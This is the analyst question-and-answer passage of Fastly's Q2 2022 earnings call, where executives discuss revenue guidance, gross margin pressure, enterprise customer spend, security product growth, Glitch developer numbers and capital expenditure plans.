Your next question comes from the line of Fatima Boolani with Citigroup. Your line is open.

Unidentified Analyst

Guys, this is Mark on for Fatima. Thanks for taking our questions. So it sounds like the strong expectations for the balance of the year. But can you provide a sense of the puts and takes and maybe key drivers of guidance for the second half that you’ve actually seen that gives you confidence for the robust outlook on the top line for the back half, especially in the current environment. Thanks.

Joshua Bixby

Yes. It’s Joshua here. I think that as we talked about, when you look at the enterprise number for the quarter, what we’re seeing is large – our largest customers and those that are growing into that scale are more optimistic, are in the middle of these transformations, have large budgets. And so we are definitely seeing that side of the market, the market we really focus on continuing to grow. And I think when you look at the guidance for the year and the quarter and the next quarter, what you see is it’s really off the back of those large customers. So we acknowledge that there is uncertainty across the entire customer base, but we are definitely seeing within our larger, more established customers, we’re seeing more their ability to plan farther out and the projects that they are working on are central to their digital transformation. What we’ve seen historically in all of these times of economic upheaval is that people do invest in digital transformation. They do invest in the channels that are working and they invest in ways to innovate. Right now, those channels are on the Internet and the innovation is directly related to where the edge cloud provides so much value. Performance matters, security matters, and it matters even more in uncertain times. So I think it’s very much related to the momentum in the largest customers. That’s really why we’ve been able to raise guidance and we continue to see strength in the business. But by no means is it clear past sailing here? We absolutely see that there is uncertainty ahead of us.

Unidentified Analyst

Okay. Great, thanks for that. And then maybe just moving on to the security business, thank you for the high-level details, but maybe can we get an update on the momentum anything quantifiable would be much appreciated. Whether it’s year-over-year sequential growth on your assets there? And then just given your 1% increase on the average enterprise customer spend, when can we maybe see some more apparent ramp there on the security business, maybe adoption from the customers? Thanks.

Joshua Bixby

Sure. So on the customer spend side, I think that that’s a number that you have to look at over a longer period of time. There is puts and takes to that. I think overall, we’re going to continue to see that go up as you say, as our customers start to and continue to adopt the security offering, but also the compute offerings as well as other offerings. So what we continue to see, and I mentioned that with a few Fortune 500 customers who have broadly adopted across the portfolio and increase their usage. That’s a pattern that we’re seeing, and that will take some time to flow through. I think overall in the security business, Ron hit on the SigSci specific numbers. But if you go zoom out a little bit and look more broadly, what you’ll see is that momentum is broad. We continue to innovate in that product line. We talked about the introduction of our Security Labs product. We talked about some of the private relay work that we’re doing. I mean security is very much top of mind for our customers, and we continue to see wide adoption. One of the encouraging elements for me is how often the next-generation WAF platform is being leveraged into our largest accounts across all of our business units. So from media through to high tech, through to technology, we are seeing that absolutely be adopted even in areas where initially, when we acquired Signal Sciences, we weren’t sure how broad that adoption would be. So we have been pleasantly surprised, and you can see that from the growth in that particular product offering.

Unidentified Analyst

Perfect. Thank you guys so much.

Operator

Your next question comes from the line of Rudy Kessinger with D.A. Davidson. Your line is open.

Rudy Kessinger

Great, guys. Thank you for taking my questions. Joined a little bit late, so I apologize if you addressed this in your prepared remarks. But when I look at the guide for the year, you’re taking rev up $10 million you’re taking the operating loss guide down by $10 million. What are the puts and takes? I know you’re still saying gross margins will ramp in the second half. But if I look at that $10 million op loss reduction, how much of that is attributed to the Glitch, attributed to a lower gross margin outlook, increased OpEx spend on product or sales elsewhere. Just could you break it down for me?

Joshua Bixby

Sure. Ron, do you want to take that one?

Ron Kisling

Certainly. So I think a couple of drivers here. I think first, we did see Q2 operating expenses come in higher than we had planned at the beginning of the year. Some of that was driven by increased headcount across the organization. Glitch was a contributor to that increased headcount across the organization. We saw higher-than-expected salary increases, acceleration of T&E and increased investment in product and go-to-market activities in the first half as well as certain one-time expense items. So when you look at the impact on the first half, we now look or anticipate that operating expenses for the year as a whole will be higher than we planned at the beginning of the year. Although we still expect to see expenses down in the second half from first half as we put in place a lot of controls around our spending and hiring levels, but largely due to that increase in spending from those drivers is why we took up the operating loss ranges for the year taking into account recognition of the increase in revenue. And from a gross margin perspective, while we still expect to see accretion in the second half, Q2 gross margins were lower than we had anticipated at the beginning of the quarter.

Rudy Kessinger

Got it. And then jumping to the gross margins, I mean, understanding there is 160 basis point impact in Q2, so really only down 50 points sequentially. But if I take a step back and compare the gross margins to, say, Q1 of 2020 pre-COVID were $57.6 million on a non-GAAP basis. And if I assume Signal Sciences is still about 80% gross margins, that would basically say that the rest of your business is running at about 46% gross margins, down about 12% from where you were pre-COVID. Understand you got some boost later in 2020 on gross margins. But I guess, just with the 12% kind of reduction in the rest of the business, what else is at play here besides the migration of some of your sites and the upgrades going on there and some pull forwards on CapEx? I have to imagine there is got to be some pricing pressure or mix shift in your business? What else is driving the gross margin compression?

Ron Kisling

Yes. I mean the big drivers, and we talked about this through 2021 was an increase in our investments in our network infrastructure, both just in terms of investments in overall capacity as well as expansion internationally and particularly with new international sites when you initially deploy them, you’re running at less than sort of full capacity. So those tend to be also a drag on gross margin. So a lot of that was driven by the investments we made in the network over the last, say, year or 18 months. Prospectively, as we look at the network, one, because of the investments we’ve made and two, as we continue to Boost our forecasting we are able to align investments much more tightly with expected traffic. And so over time, we would expect capacity and traffic to come much more in line and drive improved gross margins as that sort of invest ahead of traffic is behind us.

Rudy Kessinger

Okay. Fair enough. Thanks for taking my questions.

Joshua Bixby

Thanks, Rudy.

Operator

Your next question comes from the line of Jim Fish with Piper Sandler. Your line is open.

Quinton Gabrielli

Hi, guys. This is Quinton on for Jim Fish. Thanks for taking our questions. Maybe just first, enterprise revenue growth seemed to dip slightly compared to Q1 despite similar enterprise additions as last quarter. Are you seeing enterprise customers maybe slowed down on spend a little bit or take longer to decide on net new spending or was there something else impacting the mix of commercial versus enterprise this quarter, like some of your smaller enterprises maybe moving into the higher end of the commercial bucket?

Joshua Bixby

Ron, do you want to take that?

Ron Kisling

Sure. So I guess you had a couple of different dynamics around enterprise customers. I think when you look at it over kind of the medium-term continue to point to one, strong business with our enterprise customers. While on a trailing 12-month basis, it was down slightly at 1%, 88% of total revenues from 89%, we did see an increase in new enterprise customers this quarter of 14 compared to 12 in the last quarter and the average spend across our enterprise customers increased from $722,000 to $730,000. So we’re seeing continued increase in terms of expansion within our enterprise customers. And seeing some growth in new enterprise customers is clearly a focus to take that growth in enterprise customers and look at how we accelerate that through the work that we’re doing in marketing in terms of brand awareness and leads and the development of the sales organization to accelerate that.

Quinton Gabrielli

Okay. That’s helpful. And then maybe the last question from us is we’ve heard from exact reports how the gaming vertical specifically has continued to slow, especially as we move through the summer. To what extent is this slowdown along with slowing results from other verticals like streaming or e-commerce baked into the rate outlook provided? Are we assuming things continue to Boost in the back half of the year or are current trends embedded into this guide? Thank you.

Joshua Bixby

Ron?

Ron Kisling

Yes. So as we look at guidance in the second half, I’d say we look at a couple of things. We look at the macro environment and certainly have taken into account what we believe the trends are across the key verticals that we play in as well as we look at what is the specific traffic that we expect to gain from our customers. We do a very detailed review of our customers in terms of what their plans are. And as we said, we’ve seen good expansion within those customers. And based on discussions with those customers, we’ve built out what we think are the traffic levels, our traffic shares are likely to be. And so it really is looking at our business, our traffic levels with our specific customers with recognition that the – it’s a challenging environment. And I think the – as we sort of said on the call, we continue to see rate expansion. We continue to see new customers in a challenging environment given our relative market share that does provide us some ability to sort of, if you will, mute some of the macro drivers.

Operator

Your next question comes from the line of Will Power with Baird. Your line is open.

Charlie Erlikh

Hi, guys. This is Charlie Erlikh on for Baird. Thanks for taking the question. I just wanted to ask about maybe asking another way the revenue guidance and it pertains to the growth algorithm. Are you seeing any sort of shift in growth contribution from maybe new bookings or new customers added to the platform versus growth from existing customers or has it been pretty consistent because we’ve heard from others that maybe existing customers are growing faster than new customer growth relative to past periods?

Ron Kisling

I think where – what we saw in the second quarter was really driven by growth within existing customers. And it was a combination of traffic as well as gaining new types of traffic and new types of business with those customers. So the expansion is really around book delivery and the types of services were within those customers. We continue to see new customers. Enterprise customers did increase in the quarter. We added to our total customer base. But our core dynamic, if you look at our business is typically customers that we add in the current year contributed 5% to maybe 7% of our revenue because our customers do typically ramp and contribute and expand over time. And I would say that pattern that we’ve seen in the past is intact.

Charlie Erlikh

Okay. That makes sense. Also, I just wanted to ask if there was any changes in trends between like April versus May versus June and now July is behind us. Is there any change in the trend between those months or was it pretty consistent throughout?

Ron Kisling

I think what we saw, and this kind of mirrors kind of what you see from our revenue traffic. We started to see traffic trend up as we got toward the end of the quarter. And I think that’s fairly consistent with our overall pattern. Q1 and Q2 tend to be relatively flat. We start to see increased revenues in Q3 and further acceleration in Q4. And so traffic ramped as you moved through the quarter with higher traffic in June going into the summer months where we see the higher levels of traffic.

Charlie Erlikh

Got it. Alright. Thanks.

Joshua Bixby

Thanks, Charlie.

Operator

Your next question comes from the line of Philip Rigby with RBC Capital Markets. Your line is open.

Philip Rigby

Hi, great. Thanks for taking the question. I want to start with a follow-up on guidance. If I look at your guidance, it seems to imply a bit of a deceleration in 4Q. Is that just pertaining to the uncertainty that you talked about or are there other factors or assumptions in play there?

Ron Kisling

Yes, I’d say it’s primarily tied to kind of the uncertainty. I mean we’ve taken a strong view that we’re a usage-based business that creates some volatility. And so as we build our guidance, we take that into account. And certainly, as to the earlier question, we take into account kind of the macro trends that we’re seeing as well as the trends we’re seeing kind of on a micro basis within our own customer base.

Philip Rigby

Got it. Thanks. And then you mentioned increased salaries for employees, but I’m curious, if I look at where the stock is performing relative to some of the RSU issuances. I would be curious to hear your thoughts on stock-based comp for existing employees. Any changes in philosophy or strategies you’re thinking of taking there? Yes, any insight would be great. Thank you.

Ron Kisling

Yes. So yes, so no real change in philosophy. I think retaining employees has been really critical, particularly in this competitive environment. And I think we have used a combination of things. We talked a little bit about salary increases in the first half being a little higher than we anticipated. And we have used a combination of equity and salary to be competitive. I anticipate, just as you look at kind of the changes in the macro economy and the hiring environment, I expect the competitiveness in the hiring environment to become less competitive rather than more competitive as we kind of see the rest of the year based on where you are seeing kind of the economy and overall hiring statistics, which will certainly impact the level of competitiveness in the hiring environment.

Operator

Your next question comes from the line of Jeff Van Rhee with Craig-Hallum Capital. Your line is open.

Unidentified Analyst

Hi. This is Daniel on for Jeff Van Rhee. Just a quick question on developers and the traction there and Glitch. Just if you could provide us any additional color, walk us through, you said 100,000 incremental developers on the platform. Just any sort of sense of the scale of that relative to developers currently using Fastly or just any other metrics or color you have around developer momentum? Thanks.

Joshua Bixby

Yes, absolutely. When we acquired the platform, it was around 1.8 million, so you add 100,000 in the quarter, you get a sense for sort of how that’s scaling. One of the things that Glitch has done exceptionally well has been very intelligent about how it scales its community. So, instead of sort of opening the doors and encouraging everyone to come, they have been very thoughtful. This is a team that comes out of building some of the best developer-led products that the world has ever seen. So, they understand how that works. And one of the things that they have learned is that in order to build an exceptional developer community, you need to have exceptional features and you need to be listening to your community early and iterating. So, they followed that model. So, what we are seeing is a very consistent growth path. That’s what we saw very consistently over their history, and that’s what we will continue to see. Compared to Fastly’s history, these numbers are huge. I mean if you look at what we were doing before Glitch, it was a fraction of this, and that’s what was so exciting about this deal for us is it just absolutely Turbocharge is our ability to get developers. One of the things that was also very important was that 60% are in that range of their developers really were enterprise developers. And so that also is a very important metric for us in terms of thinking about where the targets are because we want all developers to use Fastly and we particularly want those that work in enterprises to use us.

Unidentified Analyst

Thanks.

Joshua Bixby

Thank you.

Operator

Your next question comes from the line of Tom Blakey with KeyBanc. Your line is open.

Tom Blakey

Hey guys. Thanks for taking the question. My question – I have a couple, I have a follow-up for Ron here. But my first question was on Compute@Edge and developers as well. We are at a couple of million or almost a couple of million developers. Now how is Fastly thinking about incentivizing these developers to work on Compute@Edge. I don’t – I am sure not all of them are well versed in that, just incentives there. And also maybe as an illustration, Joshua, like maybe what is that Japanese win? Like what are they working on? And what is kind of the economic opportunity alongside the app development platform? That’s my first question.

Joshua Bixby

Sure, that’s a great question. I think you are absolutely right. The edge is an area that is novel and new for a lot of developers. So, it really starts with bringing – making sure those tools are available and giving people the financial leeway in order to experiment. So, we talked about a program, a very successful program that we launched in Q4 and carried through to Q1. And we are still looking at ways where we can take this idea of taking the financial risk out of it in order for people to experiment. And the reason that’s beneficial to take the financial risk out is because – and it comes back to that that question about use cases – is because it brings so much value. So, we see customers dramatically reducing their central cloud bills. We see customers dramatically improving the performance of their applications. We see customers – like some of the examples we have stated earlier, where their sites are becoming significantly more personalized without playing off this consistent theme of, I could make it personalized, but it’s going to make it slow. What Compute@Edge brings is the ability to not be making that trade-off. And those are the kinds of things that we are seeing, but it absolutely starts with – it starts with this idea of experimentation and taking the risk out of it. And so that’s really what we see, and we see a lot of use cases, which speak to bringing together the unique capabilities of Fastly and which really come back to this idea of performance and scale and security. That’s what’s central to all of this.

Tom Blakey

Good answer. And have incentivized, it just sounds like you are. And then for Ron on the gross margin, sorry, Ron. But the – I think on the last call, we talked about mid-50s for the year in ‘22, now kind of low to mid. There is a lot of one-timers in here. That’s kind of a question, I suppose. And engaging with the percentage of maybe one-timers in the second half going into the second half of ’22, what are you building Fastly for structurally in terms of what gross margins can be sustainable long-term, ‘23 and beyond? Do you think that would be helpful for everyone?

Ron Kisling

Yes. I think that’s a good question. And I think what I would look to, and I think was referenced earlier, if you kind of look back to kind of the margins we saw sort of in ‘21, I think there is an opportunity to get back to those margins as we get some of these one-time things behind us with the efforts we put in place to better align our capacity investments with traffic on a go-forward basis. And then I think from there, then you can see additional accretion over time as we add – as security grows as a share of that, as we add more Compute@Edge. But I think as what I would say, maybe a medium-term guideline would be to see kind of where we were in ‘21 and that’s attainable just by getting beyond some of this technology transition that we talked about last quarter and managing capacity in line with traffic and bringing those two close to our line.

Tom Blakey

That’s great answer. Thanks for the clarity Ron. Just as a clarification. Last question for me. Is that 10% to 12% CapEx comment, impressive. Does that include – that can’t include the advanced payments in PP&E in ‘22. Does it and…?

Ron Kisling

Correct. It does not include the advanced payments. When we take delivery of that and actually deploy it, we will include that in our cash CapEx. So, that’s when we actually take title of the equipment when we start depreciating it. So, as we take deliveries out of that, that will be reflected in our cash CapEx. We will take some deliveries from some of those commitments in the second half and so the deliveries against those purchase commitments are reflected in that outlook of 10% to 12% cash CapEx.

Tom Blakey

That’s interesting. And maybe it’s part of the upgrades that you are making to the network. Could you state now that you expect that range to kind of be consistent for at least the foreseeable future, like in the out years?

Ron Kisling

I mean I think, generally, I think as you look, absent any sort of other major sort of changes to the product, generally, I see that as the level. I mean ultimately, I think we are getting more efficient in terms of our capital deployment across the network, and that would be kind of a good sort of medium-term guide.

Tom Blakey

Very good. Thanks guys.

Ron Kisling

Thank you.

Operator

There are no further questions at this time. I would like to turn the call back to CEO, Joshua Bixby, for closing remarks.

Joshua Bixby

Thank you. Before we sign off, I want to thank our employees, customers, partners and investors. We remain as committed as ever to fueling and securing digital experiences. And moving forward, we remain focused on execution, bringing lasting growth to our business and delivering value to our shareholders. I will remain in my role until Todd joins and I look forward to supporting him. I want to reassure you that positioning Fastly for long-term success is my number one goal throughout this process. Thank you.

Operator

This concludes today’s conference call. You may now disconnect.

Wed, 03 Aug 2022 13:47:00 -0500 en text/html https://seekingalpha.com/article/4529442-fastly-inc-fsly-ceo-joshua-bixby-on-q2-2022-results-earnings-call-transcript
9L0-619 exam dump and training guide direct download
Training Exams List